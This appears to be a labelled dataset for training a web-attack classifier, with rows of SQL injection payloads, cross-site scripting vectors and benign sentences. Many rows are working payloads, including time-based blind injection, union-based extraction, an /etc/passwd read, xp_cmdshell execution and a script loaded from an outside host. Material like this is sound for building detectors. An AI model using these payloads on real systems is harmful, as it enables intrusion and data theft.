( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) -- jpqa",2,SQLi,11138 <select id=x tabindex=1 onbeforeactivate=alert(1)></select>,1,XSS,3768 1'+ ( select iowv where 6105 = 6105 and sleep ( 5 ) #,2,SQLi,18087 Where did you find that adorable kitten from?,3,normal,23815 "1' or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,17843 <frame id=x tabindex=1 onbeforeactivate=alert(1)></frame>,1,XSS,4131 "<div draggable=""true"" contenteditable>drag me</div><head ondragover=alert(1) contenteditable>drop here</head>",1,XSS,1051 1'+ ( select 'qsqs' where 9227 = 9227 waitfor delay '0:0:5' ) +',2,SQLi,16789 <pre onpointerover=alert(1)>XSS</pre>,1,XSS,8670 "select * from users where id = 1 or ""$_"" or 1 = 1 -- 1",2,SQLi,17894 -3186 or 3867 = 9405,2,SQLi,21792 "1"" ) ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13361 "{""id"":null,""firstName"":""Eevee"",""lastName"":""Yeo"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27538 "1"" where 8734 = 8734",2,SQLi,21768 "1'+ ( select kqac where 4362 = 4362 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,12576 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noembed id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></noembed>",1,XSS,173 1'|| ( select 'npel' from dual where 5258 = 5258,2,SQLi,18785 select ( case when ( 5704 = 4125 ) then 5704 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13609 "<div draggable=""true"" contenteditable>drag me</div><frameset ondragover=alert(1) contenteditable>drop here</frameset>",1,XSS,791 "-2605%' ) ) ) union all select 4738,4738#",2,SQLi,19393 Where's the meditation center?,3,normal,23660 "1%' and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,14071 "1'|| ( select 'ozki' where 4435 = 4435 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) ) ||'",2,SQLi,10072 "<wbr draggable=""true"" ondragstart=""alert(1)"">test</wbr>",1,XSS,4619 "-8124 ) union all select 7251,7251,7251#",2,SQLi,19528 "<style>:target {color: red;}</style><embed id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></embed>",1,XSS,910 1 ) ) ) and ( 6148 = 3343 ) *3343 and ( ( ( 3271 = 3271,2,SQLi,17815 Where should we meet for our meeting?,3,normal,22906 "<xss onkeypress=""alert(1)"" contenteditable style=display:block>test</xss>",1,XSS,2295 "1"" ) where 7914 = 7914 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #",2,SQLi,15227 "1"" and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual )",2,SQLi,10057 "<meter onmouseenter=""alert(1)"">test</meter>",1,XSS,7276 <image id=x tabindex=1 onfocusin=alert(1)></image>,1,XSS,5653 1' ) where 5680 = 5680 and ( 3020 = 3020 ) *6703--,2,SQLi,18503 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25",2,SQLi,14112 "1"" ) as iwri where 4921 = 4921 or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) --",2,SQLi,14890 "<style>:target {color:red;}</style><figcaption id=x style=""transition:color 1s"" ontransitionend=alert(1)></figcaption>",1,XSS,759 "1"" ) ) union all select null,null,null,null,null,null,null,null#",2,SQLi,16750 "<slot draggable=""true"" ondragstart=""alert(1)"">test</slot>",1,XSS,4123 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10",2,SQLi,19792 <svg><x><script>alert('1'&#41</x>,1,XSS,9396 "1' ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( 'kmjn' = 'kmjn",2,SQLi,13022 "<script>throw onerror=alert,1</script>",1,XSS,8306 Select your hope.,3,normal,24941 <option onpointerover=alert(1)>XSS</option>,1,XSS,7232 &lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;,1,XSS,1703 <optgroup onpointerleave=alert(1)>XSS</optgroup>,1,XSS,5881 "He also appointed another select committee to consider how to control expenditure, the chairman of which, Mr. Herbert Samuel, told him that his fault as a Chancellor of the Exchequer was that he was "" too amiable.""",3,normal,26130 <script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>,1,XSS,58 "<style>:target {transform: rotate(180deg);}</style><b id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></b>",1,XSS,732 "<div draggable=""true"" contenteditable>drag me</div><track ondragover=alert(1) contenteditable>drop here</track>",1,XSS,980 "1"" and ( 7424 = 2381 ) *2381 and ""dvju"" = ""dvju",2,SQLi,18865 -9120' ) ) or 8571 = 8571--,2,SQLi,20919 "1 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) # ogwe",2,SQLi,13422 "<style>.XSS{background-image:url(""javascript:document.vulnerable=true"");}</STYLE><A CLASS=XSS></a>",1,XSS,1501 <nextid onpointerup=alert(1)>XSS</nextid>,1,XSS,7733 <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>,1,XSS,7573 "<section onmouseleave=""alert(1)"">test</section>",1,XSS,6196 ") or (1""=""1",2,SQLi,22344 """+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23",2,SQLi,14766 "1%"" or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11770 <button onProgress=javascript:alert(1)>,1,XSS,8304 1'+ ( select 'wyxu' where 2555 = 2555 union all select null#,2,SQLi,17187 "<rp onbeforecopy=""alert(1)"" contenteditable>test</rp>",1,XSS,4962 "select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( ( 8535 = 8535",2,SQLi,13853 "{""id"":null,""name"":""trip""}",3,normal,27517 "-3361 ) ) union all select 2827,2827,2827,2827#",2,SQLi,18821 "{""id"":null,""name"":""rest""}",3,normal,26793 "1' ) as noqp where 4042 = 4042 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12293 "<legend draggable=""true"" ondrag=""alert(1)"">test</legend>",1,XSS,4366 Select your challenge.,3,normal,24923 "1 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )",2,SQLi,11882 "-9353"" where 4607 = 4607 union all select 4607,4607,4607,4607,4607,4607#",2,SQLi,15962 """),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,17460 "1,exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 7759 = 7759,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) )",2,SQLi,13029 "1"" ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ""zxks"" = ""zxks",2,SQLi,17078 <meta id=x tabindex=1 onactivate=alert(1)></meta>,1,XSS,5735 1 ) as kaew where 2658 = 2658,2,SQLi,20699 From the corner of her eye she saw Keaton select a rock from the drive and throw it into the woods.,3,normal,26166 "1"" ) ) as hkrh where 3060 = 3060 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11602 "<link onmouseleave=""alert(1)"">test</link>",1,XSS,7702 or 1=1 /*,2,SQLi,22457 1' ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,16774 "<iframe onmouseleave=""alert(1)"">test</iframe>",1,XSS,6642 "<strike onkeypress=""alert(1)"" contenteditable>test</strike>",1,XSS,3655 "1 ) as iuje where 1976 = 1976 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --",2,SQLi,12857 "-2289"" ) or 8624 = 6279 and ( ""ised"" = ""ised",2,SQLi,19130 1'+ ( select hett where 7228 = 7228,2,SQLi,20100 "<script>if(""x\\xE1\x96\x89"".length==2) { javascript:alert(1);}</script>",1,XSS,2418 1'+ ( select 'qxmo' where 9511 = 9511 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,14420 "{""id"":null,""firstName"":""Angelina"",""lastName"":""Tan"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27254 "<style>@keyframes x{}</style><mark style=""animation-name:x"" onanimationstart=""alert(1)""></mark>",1,XSS,1616 1 where 4519 = 4519,2,SQLi,21965 "1'|| ( select 'ybfo' from dual where 3319 = 3319 union all select null,null,null,null,null,null,null,null#",2,SQLi,13815 <s onpointerenter=alert(1)>XSS</s>,1,XSS,9276 1' ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( 'rgyc' = 'rgyc,2,SQLi,12708 "<video src=_ onloadstart=""alert(1)"">",1,XSS,8979 Select your position.,3,normal,24857 "-8203 ) ) as eqlf where 6132 = 6132 union all select 6132,6132,6132,6132,6132,6132,6132,6132,6132--",2,SQLi,14188 "{""id"":null,""firstName"":""Kai Keng"",""lastName"":""Choy"",""address"":""10 TOH GUAN ROAD, #06-00"",""city"":""798"",""telephone"":""6246750838""}",3,normal,26905 "When the additional menu items appear, select Create New Label.",3,normal,25155 <content onfocusout=alert(1) tabindex=1 id=x></content><input autofocus>,1,XSS,2368 Select your favorite.,3,normal,24825 "1"" ) ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( ( ""mmvu"" = ""mmvu",2,SQLi,14259 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#",2,SQLi,15380 <h1 onpointerup=alert(1)>XSS</h1>,1,XSS,9350 "1%"" ) ) and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,13844 1' ) where 8128 = 8128,2,SQLi,21528 <marquee id=x tabindex=1 onfocusin=alert(1)></marquee>,1,XSS,4788 "[color=red' onmouseover=""alert('xss')""]mouse over[/color]",1,XSS,3998 <script>for((i)in(self))eval(i)(1)</script>,1,XSS,7077 1' ) as yqld where 2489 = 2489,2,SQLi,20656 "<table onmousemove=""alert(1)"">test</table>",1,XSS,7543 "1' ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( 'ydxb' = 'ydxb",2,SQLi,13129 "<legend draggable=""true"" ondragend=""alert(1)"">test</legend>",1,XSS,3681 I'm considering where to attend a seminar.,3,normal,23914 1%' ) ) or sleep ( 5 ) #,2,SQLi,21190 1 and user_name ( ) = 'dbo',2,SQLi,20865 "1', ( select ( case when ( 5249 = 9648 ) then 1 else 1/ ( select 0 ) end ) )",2,SQLi,15532 ( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( ( ( '%' = ',2,SQLi,16543 "1"" ) ) as jrld where 3488 = 3488",2,SQLi,20308 AND 1=1 AND '%'=',2,SQLi,22080 -1011 or 7140 = 9977--,2,SQLi,21547 ( select * from ( select ( sleep ( 5 ) ) ) srmq ) and 'mcrt' = 'mcrt,2,SQLi,16432 "{""id"":null,""firstName"":""Tony"",""lastName"":""Wang"",""address"":""500 NORTH A STREET, RICHMOND IN 47374"",""city"":""243"",""telephone"":""942102915""}",3,normal,27106 "<img onmousedown=""alert(1)"">test</img>",1,XSS,8411 Where's the orthodontist?,3,normal,23631 "<th draggable=""true"" ondragleave=""alert(1)"">test</th>",1,XSS,4972 Let's decide where to spend the summer vacation.,3,normal,23963 <textarea oncopy=alert(1) autofocus>XSS</textarea>,1,XSS,5533 1' ) ) as jzoh where 6484 = 6484 and 7364 = 4233--,2,SQLi,18458 &#00060,1,XSS,9865 */</script>'>alert(1)/*<script/1=',1,XSS,9295 "<a href=""javascript#document.vulnerable=true;"">",1,XSS,6103 "<details onmousedown=""alert(1)"">test</details>",1,XSS,6397 "1"" where 3247 = 3247 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12923 "select * from users where id = 1 or $<\ union select 1,@@VERSION -- 1",2,SQLi,16266 "<pre onkeyup=""alert(1)"" contenteditable>test</pre>",1,XSS,5610 "1%' ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( '%' = '",2,SQLi,11576 Select a topic for the presentation.,3,normal,24184 "1%"" ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( ""%"" = """,2,SQLi,15986 "<script>alert(""XSS"");</script>&search=1",1,XSS,8096 "1 ) or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,15181 Where's your SQL source?,3,normal,23421 "<rt draggable=""true"" ondragenter=""alert(1)"">test</rt>",1,XSS,4880 "&lt;A HREF=\""http&#58;//google&#46;com/\""&gt;XSS&lt;/A&gt;",1,XSS,3806 "<?='<SCRIPT>alert(""XSS"")</SCRIPT>'?>",1,XSS,8774 -9014' order by 1--,2,SQLi,21967 <span id=x tabindex=1 onfocus=alert(1)></span>,1,XSS,6488 if ( 1928 = 4811 ) select 1928 else drop function ucko--,2,SQLi,17648 "-5630"" ) or 3038 = 3038",2,SQLi,21328 1 ) ) and sleep ( 5 ) and ( ( 9084 = 9084,2,SQLi,19408 <select onpointerup=alert(1)>XSS</select>,1,XSS,7666 "{""id"":null,""firstName"":""Lotus"",""lastName"":""Li"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27033 "1' in boolean mode ) and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,13292 "-1922%' ) union all select 2335,2335,2335,2335,2335,2335,2335,2335,2335,2335--",2,SQLi,15360 copy myfile from '/etc/passwd';,2,SQLi,20501 "-5424' ) ) union all select 8231,8231,8231,8231,8231,8231,8231,8231#",2,SQLi,16423 -6661' ) ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( 'tbmu' like 'tbmu,2,SQLi,10513 "1 ) as ghew where 6441 = 6441 union all select null,null--",2,SQLi,17353 "1"" ) ) and elt ( 3785 = 9386,9386 ) and ( ( ""inwa"" like ""inwa",2,SQLi,17081 <textarea onchange=alert(1)>XSS</textarea>,1,XSS,7549 "1%' ) ) ) and elt ( 4249 = 4249,7259 ) and ( ( ( '%' = '",2,SQLi,17621 "<tbody onmouseout=""alert(1)"">test</tbody>",1,XSS,7697 %3Cscript%3Ealert(1)%3C/script%3E##1,1,XSS,8958 It is a matter for the trustees to judge whether the person they select to advise them is suitable or possesses the appropriate credentials.,3,normal,25975 1%' ) ) and ( 3020 = 3020 ) *6703 and ( ( '%' = ',2,SQLi,18552 ") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337'='1337",2,SQLi,16824 "1"" ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( ( ""iuxs"" like ""iuxs",2,SQLi,15049 "1"" ) ) as uels where 9447 = 9447 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --",2,SQLi,12759 "<hr onmousedown=""alert(1)"">test</hr>",1,XSS,8839 -5021'+ ( select yadq where 4285 = 4285 order by 1#,2,SQLi,18266 "-4756%' ) ) union all select 7824,7824,7824,7824,7824,7824,7824,7824#",2,SQLi,16281 "-7741' ) where 8271 = 8271 union all select 8271,8271,8271,8271,8271,8271,8271#",2,SQLi,15262 "select * from users where id = 1 or ""$ ( "" or 1 = 1 -- 1",2,SQLi,17588 1 ) as qkkm where 8461 = 8461,2,SQLi,20714 "<style>@import ""data:,*%7bx:expression(javascript:alert(1))%7D"";</style>",1,XSS,2342 ><img src=1 onerror=alert(1)>.gif,1,XSS,9384 "<listing onbeforepaste=""alert(1)"" contenteditable>test</listing>",1,XSS,2915 Select your industry.,3,normal,24863 Where's the ski resort?,3,normal,23613 <applet onpointerleave=alert(1)>XSS</applet>,1,XSS,7007 Select spoon.,3,normal,24532 "select pg_sleep ( 5 ) and ""zhsc"" = ""zhsc",2,SQLi,19495 I want to select a new book to read.,3,normal,23754 <sub id=x tabindex=1 onactivate=alert(1)></sub>,1,XSS,6229 1' ) as jrqh where 6204 = 6204 and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #,2,SQLi,14865 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i",2,SQLi,11812 "-6760 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) # ikqw",2,SQLi,10614 1'+ ( select 'jtvq' where 8288 = 8288 and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #,2,SQLi,14492 Select repair.,3,normal,24619 <iframe/src=javascript:confirm(1),1,XSS,9397 x' OR full_name LIKE '%Bob%,2,SQLi,20854 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ( 7700 = 7700",2,SQLi,13508 <caption onpointerup=alert(1)>XSS</caption>,1,XSS,7210 "-9656"" union all select 8735,8735--",2,SQLi,20024 -7675%' ) ) ) order by 1--,2,SQLi,21018 <bdi id=x tabindex=1 ondeactivate=alert(1)></bdi><input id=y autofocus>,1,XSS,2479 "<svg ondblclick=""alert(1)"">test</svg>",1,XSS,8677 "-5062"" ) ) ) or ( 1069 = 8974 ) *8974 and ( ( ( ""hsge"" = ""hsge",2,SQLi,16928 Join the hiking expedition next weekend.,3,normal,22948 Where's the club?,3,normal,23549 "<col draggable=""true"" ondragstart=""alert(1)"">test</col>",1,XSS,4560 "1%"" union all select null,null,null,null#",2,SQLi,19423 declare @s varchar ( 200 ) select @s = 0x73656c65637420404076657273696f6e exec ( @s ),2,SQLi,14905 "<dialog onclick=""alert(1)"">test</dialog>",1,XSS,7907 select ( case when ( 1291 = 6612 ) then 1 else 1291* ( select 1291 from master..sysdatabases ) end ) --,2,SQLi,13951 Select your identity.,3,normal,24897 "{""id"":null,""firstName"":""Arun"",""lastName"":""Kumar"",""address"":""34 Raritan Center Pky"",""city"":""673"",""telephone"":""3929911605""}",3,normal,27615 1' ) ) ) and 7533 = 7533 and ( ( ( 'hoyw' = 'hoyw,2,SQLi,18617 Select the perfect piece of jewelry.,3,normal,24121 -1375' ) ) ) or ( 1226 = 9648 ) *9648 and ( ( ( 'kfoy' like 'kfoy,2,SQLi,16667 "He addressed a comparatively small and select circle, a congregation of thoughtful and devout men, who cultivated reverence and loved religion all the more that their own beliefs were limited to the simplest and sublimest truths.",3,normal,26131 1'+ ( select 'ozpm' where 6939 = 6939 rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) ) +',2,SQLi,13641 "<scRiPt y=""><"">/*<sCRipt* */prompt()</script",1,XSS,7042 <xss id=x tabindex=1 onfocusin=alert(1)></xss>,1,XSS,6439 "1' where 8837 = 8837 and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12886 "<basefont onmousedown=""alert(1)"">test</basefont>",1,XSS,6023 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( table_name ) FROM ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables ) WHERE LIMIT = 8 ) ) AND 'i' = 'i",2,SQLi,11513 "<style>:target {color:red;}</style><video id=x style=""transition:color 1s"" ontransitionend=alert(1)></video>",1,XSS,1128 "<element draggable=""true"" ondrag=""alert(1)"">test</element>",1,XSS,3941 "<IMG SRC=""jav&#x0A;ascript:alert('XSS');"">",1,XSS,7311 "{""id"":null,""firstName"":""Angeline"",""lastName"":""Tan"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27093 "<dialog onmouseleave=""alert(1)"">test</dialog>",1,XSS,6637 Join tables where valid.,3,normal,23342 "1 ) where 8671 = 8671 and make_set ( 4931 = 1642,1642 ) --",2,SQLi,17450 1 ) ) ) rlike sleep ( 5 ) #,2,SQLi,20936 Select soda.,3,normal,24514 "<style>@keyframes x{}</style><bdo style=""animation-name:x"" onanimationstart=""alert(1)""></bdo>",1,XSS,1671 "Don't forget to select rugs and carpet that emit limited fumes and are anti-bacterial, anti-fungal and able to secure to floor.",3,normal,26237 "1 where 8390 = 8390 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) --",2,SQLi,15760 "select count ( * ) from generate_series ( 1,5000000 ) and ( ( ""dros"" = ""dros",2,SQLi,15522 "<IMG SRC=""jav&#x0A;ascript:alert('');"">",1,XSS,8179 "<style>:target {color:red;}</style><marquee id=x style=""transition:color 1s"" ontransitionend=alert(1)></marquee>",1,XSS,940 "1, ( select ( case when ( 8674 = 7896 ) then 1 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual )",2,SQLi,13501 Where's the best place to watch the sunset?,3,normal,23730 1' and sleep ( 5 ) and 'kapr' = 'kapr,2,SQLi,19906 """),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,18809 "1%"" ) ) rlike ( select ( case when ( 4207 = 1757 ) then 1 else 0x28 end ) ) and ( ( ""%"" = """,2,SQLi,14652 "<colgroup oncut=""alert(1)"" contenteditable>test</colgroup>",1,XSS,3900 "1"" ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ""usht"" like ""usht",2,SQLi,10358 `'><script>\x0Cjavascript:alert(515)</script>,1,XSS,6747 <time onpointerenter=alert(1)>XSS</time>,1,XSS,7922 1' where 1153 = 1153 or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) --,2,SQLi,15508 "1 where 7196 = 7196 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) --",2,SQLi,15865 "<noscript ondblclick=""alert(1)"">test</noscript>",1,XSS,6158 "<nextid draggable=""true"" ondragleave=""alert(1)"">test</nextid>",1,XSS,3314 "1"" ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( ""cadh"" like ""cadh",2,SQLi,15139 "<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ?",1,XSS,481 "<style>@keyframes x{}</style><slot style=""animation-name:x"" onanimationstart=""alert(1)""></slot>",1,XSS,1598 "-4543"" ) or 3038 = 3038",2,SQLi,21311 Please unban to pubg and ignore the lame excuses of PTA.... And most important thing is their youth has selected perhaps you as their PM.,3,normal,26487 "select count ( * ) from generate_series ( 1,5000000 ) and ( ""%"" = """,2,SQLi,16500 -7552 or 6872 = 6872,2,SQLi,21874 "1 ) ) ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( ( 2230 = 2230",2,SQLi,11927 You can select multiple bookmarks to move at once by holding down the Control or Command key as you click to select your favorites.,3,normal,25084 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ( ( ""ymss"" = ""ymss",2,SQLi,13469 "-1184"" ) ) ) union all select 1482--",2,SQLi,19950 "-6194"" or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) )",2,SQLi,10703 "1"" ) ) as knyf where 8109 = 8109 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,13695 1'+ ( select 'rejz' where 1530 = 1530 and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) ) +',2,SQLi,10062 --><!--*{color:red} /* all UA */,1,XSS,9476 "<tr oncontextmenu=""alert(1)"">test</tr>",1,XSS,8476 "1 where 2292 = 2292 union all select null,null,null,null#",2,SQLi,17519 Insert the fresh cartridge.,3,normal,22750 "1"" ) ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( ( ""dwcy"" = ""dwcy",2,SQLi,10403 <svg><label onload=alert(1)></label>,1,XSS,8842 -2751 where 6334 = 6334 or ( 9668 = 5845 ) *5845--,2,SQLi,18518 "1"" ) where 4180 = 4180 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11829 1 and ( 1977 = 6852 ) *6852-- clxl,2,SQLi,20159 1 ) as fnpq where 5209 = 5209,2,SQLi,20723 "select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and 'xemh' = 'xemh",2,SQLi,13895 ; exec master..xp_cmdshell 'ping 10.10.1.2'--,2,SQLi,18986 Where's the self-help seminar?,3,normal,23662 &lt;IMG SRC=javascript:alert(&apos;XSS&apos;)&gt;,1,XSS,5717 "<video autoplay onplaying=alert(1)><source src=""validvideo.mp4"" type=""video/mp4""></video>",1,XSS,1788 "1"" ) ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( ""oxvw"" = ""oxvw",2,SQLi,11925 "{""id"":null,""name"":""scared""}",3,normal,27132 Determine fields where applicable.,3,normal,23302 "{""id"":null,""firstName"":""Ashikin"",""lastName"":""Said"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27320 "-9361"" ) ) union all select 3112#",2,SQLi,20226 <td id=x tabindex=1 onfocus=alert(1)></td>,1,XSS,7481 -6473' union all select 7537#,2,SQLi,20762 &lt;scrscriptipt&gt;alert(1)&lt;/scrscriptipt&gt;,1,XSS,5720 -2361' ) ) as mzhv where 2905 = 2905 or 9026 = 5388--,2,SQLi,18100 -9522 ) as lraw where 9472 = 9472 or ( 4087 = 8213 ) *8213--,2,SQLi,17213 "<a onmouseup=""alert(1)"">test</a>",1,XSS,9418 <font onpointerenter=alert(1)>XSS</font>,1,XSS,8043 Select votes could use a blockchain-based mobile app to vote.,3,normal,25577 select 'qqpjq'|| ( case 5118 when 5118 then 1 else 0 end ) ||'qzvzq' from rdb$database,2,SQLi,14880 "<style>:target {color: red;}</style><table id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></table>",1,XSS,885 Select nearest store.,3,normal,24438 "<style>:target {transform: 